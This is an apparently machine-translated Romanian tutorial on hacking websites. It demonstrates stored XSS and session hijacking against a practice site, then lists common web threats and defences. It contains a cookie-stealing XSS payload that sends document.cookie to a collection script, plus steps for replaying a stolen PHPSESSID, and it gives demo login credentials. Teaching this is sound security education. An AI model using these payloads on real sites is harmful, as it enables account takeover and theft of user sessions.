Cum să piratezi un site web? Tehnici comune de hacking de site

Tehnici de hacking de site-uri web

Mai mulți oameni au acces la internet decât oricând. Acest lucru a determinat multe organizații să dezvolte aplicații bazate pe web pe care utilizatorii le pot folosi online pentru a interacționa cu organizația. Codul scris prost pentru aplicațiile web poate fi exploatat pentru a obține acces neautorizat la date sensibile și servere web.

În acest tutorial veți învăța cum să piratați site-uri web și vă vom prezenta tehnici de hacking de aplicații web și contramăsuri puteți pune în aplicare pentru a vă proteja împotriva unor astfel de atacuri.

Cum să piratezi un site web

În acest scenariu practic de hacking de site-uri web, vom deturna sesiunea de utilizator a aplicației web situată la www.techpanda.org. Vom folosi scripturi încrucișate pentru a citi ID-ul sesiunii cookie, apoi îl vom folosi pentru a uzurpa identitatea unei sesiuni de utilizator legitime.

Presupunerea făcută este că atacatorul are acces la aplicația web și ar dori să deturneze sesiunile altor utilizatori care folosesc aceeași aplicație. Scopul acestui atac ar putea fi obținerea accesului de administrator la aplicația web, presupunând că contul de acces al atacatorului este unul limitat.

Pas 1) Deschideți adresa URL http://www.techpanda.org/.

În scopuri practice, este recomandat să obțineți acces folosind SQL Injection. Faceți referire la aceasta articol pentru mai multe informații despre cum să faci asta.

Pas 2) Introduceți detaliile de conectare.

E-mailul de conectare este admin@google.com, parola este Password2010.

Pas 3) Verificați tabloul de bord.

Dacă v-ați autentificat cu succes, veți obține următorul tablou de bord

Hack un site web

Pas 4) Introduceți conținut nou.

Faceți clic pe Adăugare contact nou și introduceți următoarele ca prenume

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Pas 5) Adăuga Javascript.

Codul de mai sus folosește JavaScenariu. Se adaugă un hyperlink cu un eveniment onclick. Când utilizatorul nebănuit face clic pe link, evenimentul preia PHP ID-ul sesiunii cookie și îl trimite către snatch_sess_id.php pagina împreună cu ID-ul sesiunii în URL

Hack un site web

Pas 6) Adăugați detalii.

Introduceți detaliile rămase așa cum se arată mai jos și faceți clic pe Salvare modificări

Hack un site web

Pas 7) Verificați tabloul de bord.

Tabloul de bord va arăta acum ca următorul ecran

Hack un site web

Pas 8) Verificați ID-ul sesiunii.

  • Deoarece codul de script cross site este stocat în baza de date, acesta va fi încărcat de fiecare dată când utilizatorii cu drepturi de acces se autentifică
  • Să presupunem că administratorul se autentifică și dă clic pe hyperlinkul care spune Dark
  • El/ea va primi fereastra cu ID-ul sesiunii afișat în URL
  • Hack un site web

    notițe: scriptul ar putea trimite valoarea unui server la distanță unde este stocat PHPSESSID, apoi utilizatorul a fost redirecționat înapoi la site ca și cum nimic nu s-ar fi întâmplat.

    notițe: valoarea pe care o obțineți poate fi diferită de cea din această pagină web tutorial de hacking, dar conceptul este același

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    Diagrama de mai jos arată pașii pe care trebuie să îi parcurgeți pentru a finaliza acest exercițiu.

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Vei avea nevoie Firefox browser web pentru această secțiune și suplimentul Tamper Data
    • Operatii Deschise Firefox și instalați add-ul așa cum se arată în diagramele de mai jos

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Căutați date de manipulare, apoi faceți clic pe instalare, așa cum se arată mai sus

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Faceți clic pe Accept și Instalați...

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Faceți clic pe Reporniți acum când se termină instalarea
    • Activați bara de meniu în Firefox daca nu este afisat

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Faceți clic pe meniul de instrumente, apoi selectați Tamper Data așa cum se arată mai jos

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Veți obține următoarea fereastră. Notă: Dacă Windows nu este gol, apăsați butonul de ștergere

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Faceți clic pe meniul Start Tamper
    • Treceți înapoi la Firefox browser web, tastați http://www.techpanda.org/dashboard.php apoi apăsați tasta Enter pentru a încărca pagina
    • Veți obține următorul pop-up din Tamper Data

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Fereastra pop-up are trei (3) opțiuni. Opțiunea Tamper vă permite să modificați informațiile antetului HTTP înainte de a fi trimise la server.
    • Apasa pe el
    • Veți obține următoarea fereastră

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • copiaţi ID-ul sesiunii PHP ați copiat din adresa URL a atacului și ați lipit-o după semnul egal. Valoarea dvs. ar trebui să arate acum astfel
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Faceți clic pe butonul OK
    • Veți primi din nou fereastra pop-up Tamper data

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    • Debifați caseta de selectare care întreabă Continuați manipularea?
    • Faceți clic pe butonul de trimitere când ați terminat
    • Ar trebui să puteți vedea tabloul de bord așa cum se arată mai jos

    Utilizarea uzurpare a sesiunii Firefox și suplimentul Tamper Data

    notițe: nu ne-am autentificat, am uzurpat identitatea unei sesiuni de autentificare folosind valoarea PHPSESSID pe care am preluat-o folosind scripturi încrucișate

    Ce este o aplicație web? Ce sunt amenințările web?

    O aplicație web (aka website) este o aplicație bazată pe modelul client-server. The serverul oferă accesul la baza de date și logica de afaceri. Este găzduit pe un server web. Aplicația client rulează pe browserul web client. Aplicațiile web sunt de obicei scrise în limbi precum Java, C# și VB.Net, PHP, ColdFusion Markup Language etc. motoarele de baze de date utilizate în aplicațiile web includ MySQL, MS SQL Server, PostgreSQL, SQLite, Etc

    Top tehnici de hacking site-uri

    Majoritatea aplicațiilor web sunt găzduite pe servere publice accesibile prin Internet. Acest lucru îi face vulnerabili la atacuri datorită accesibilității ușoare. Următoarele sunt amenințări comune ale aplicațiilor web.

    • Injecție SQL – scopul acestei amenințări ar putea fi ocolirea algoritmilor de conectare, sabotarea datelor etc.
    • Atacuri de negare a serviciului– scopul acestei amenințări ar putea fi de a refuza accesul utilizatorilor legitimi la resursă
    • Cross Site Scripting XSS– scopul acestei amenințări ar putea fi injectarea de cod care poate fi executat în browser-ul clientului.
    • Intoxicare prin cookie/sesiune– scopul acestei amenințări este de a modifica cookie-urile/datele de sesiune de către un atacator pentru a obține acces neautorizat.
    • Modificarea formularelor – scopul acestei amenințări este modificarea datelor din formular, cum ar fi prețurile în aplicațiile de comerț electronic, astfel încât atacatorul să poată obține articole la prețuri reduse.
    • Injectarea codului – scopul acestei amenințări este de a injecta cod precum PHP, Python, etc. care pot fi executate pe server. Codul poate instala uși din spate, poate dezvălui informații sensibile etc.
    • Desfigurare– scopul acestei amenințări este modificarea paginii afișate pe un site web și redirecționarea tuturor solicitărilor de pagină către o singură pagină care conține mesajul atacatorului.

    Cum să vă protejați site-ul împotriva hackurilor?

    O organizație poate adopta următoarea politică pentru a se proteja împotriva atacurilor pe serverele web.

    • Injecție SQL – igienizarea și validarea parametrilor utilizatorului înainte de a le trimite la baza de date pentru procesare poate ajuta la reducerea șanselor de a fi atacat prin Injecție SQL. Motoare de baze de date precum MS SQL Server, MySQL, etc. suportă parametrii și declarațiile pregătite. Sunt mult mai sigure decât instrucțiunile SQL tradiționale
    • Atacurile de refuzare a serviciului - firewall-urile pot fi folosite pentru a elimina traficul de la o adresă IP suspectă dacă atacul este un simplu DoS. Configurarea corectă a rețelelor și a sistemului de detectare a intruziunilor poate ajuta, de asemenea, la reducerea șanselor de a Atacul DoS avut succes.
    • Cross Site Scripting – validarea și dezinfectarea antetelor, parametrilor trecuți prin adresa URL, parametrii de formular și valorile ascunse pot ajuta la reducerea atacurilor XSS.
    • Intoxicare prin cookie/sesiune – acest lucru poate fi prevenit prin criptarea conținutului cookie-urilor, oprirea cookie-urilor după un timp, asocierea cookie-urilor cu adresa IP a clientului care a fost folosită pentru a le crea.
    • Călirea formei - acest lucru poate fi prevenit prin validarea și verificarea intrării utilizatorului înainte de procesarea acesteia.
    • Injectarea codului - acest lucru poate fi prevenit tratând toți parametrii ca date și nu ca cod executabil. Igienizarea și validarea pot fi folosite pentru a implementa acest lucru.
    • Deformarea - o bună politică de securitate pentru dezvoltarea de aplicații web ar trebui să asigure că sigilează vulnerabilități utilizate în mod obișnuit pentru a accesa serverul web. Aceasta poate fi o configurație adecvată a sistemului de operare, a software-ului serverului web și a celor mai bune practici de securitate la dezvoltarea aplicațiilor web.
    Verifica acest lucru: 9 cele mai bune scanere de adrese URL pentru a verifica linkul este protejat de malware

    Rezumat

    • O aplicație web se bazează pe modelul server-client. Partea client folosește browserul web pentru a accesa resursele de pe server.
    • Aplicațiile web sunt de obicei accesibile prin internet. Acest lucru îi face vulnerabili la atacuri.
    • Amenințările aplicațiilor web includ injectarea SQL, injectarea codului, XSS, Defacement, otrăvirea cookie-urilor etc.
    • O bună politică de securitate atunci când dezvoltați aplicații web poate ajuta la securizarea acestora.